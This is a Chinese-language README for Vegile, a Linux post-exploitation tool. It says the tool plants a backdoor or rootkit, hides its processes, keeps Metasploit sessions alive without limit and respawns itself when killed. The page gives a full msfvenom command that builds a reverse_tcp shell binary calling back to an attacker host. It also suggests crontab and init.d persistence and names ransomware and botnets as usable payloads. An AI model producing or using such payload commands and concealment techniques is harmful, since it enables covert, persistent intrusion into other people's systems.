Vegile - 壳中之鬼

Vegile 是一款用于 后渗透 技术的 Linux 工具。后渗透技术能确保我们维持一定程度的 访问权限,并可能 深入 目标 可信网络,建立更稳固的立足点。

捐赠
- 如果这个项目对你的渗透测试非常有帮助,并且你想支持我,你可以请我喝杯咖啡 :)

📖 工作原理
该工具将设置你的 后门/rootkit
后门设置完毕后,它会 隐藏 你的特定进程,无限 你的 metasploit 会话 并且 透明化。即使进程被 杀死,它也会 重新运行。总有一个进程会 运行 另一个进程,所以我们可以认为这个进程是 不可停止 的,如同 壳中之鬼
请阅读以下信息
- 目前我只测试了使用 msfvenom 命令的 reverse_shell 后门以及我的手动 Linux 后门 [ 它有效 ],你也可以使用 thefatrat 来帮助你创建简单的后门
- msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=IP LPORT=PORT -b "\x00" -f elf -o NAME_BACKDOOR
- 对于隐藏进程,你可以用于 rootkit、后门、勒索软件和僵尸网络 { sh、python、perl、exe 和 二进制文件 }。
- 目标受害者:所有包含 base32 和 base64 的 Linux 发行版系统
- 要实现持久化,你可以使用 crontab 和 xinit.d 植入后门
- 这只是一个简单的算法示例,说明我们如何维护会话和后门/rootkit,你可以自行探索
开始使用
git clone https://github.com/Screetsec/Vegile.git
cd Vegile
chmod +x Vegile
使用 Vegile
不带任何参数运行 Vegile 会显示一份有用的常用选项列表。你可以使用以下命令:
- Vegile -i / --inject [后门/rootkit]
- Vegile -u / --unlimited [后门/rootkit]
- Vegile -h / --help
演示视频
:octocat: 致谢
免责声明
注意:允许对本源代码进行修改、更改或篡改,但任何使用本代码的公开版本必须获得本工具作者(Edo maland)的书面批准。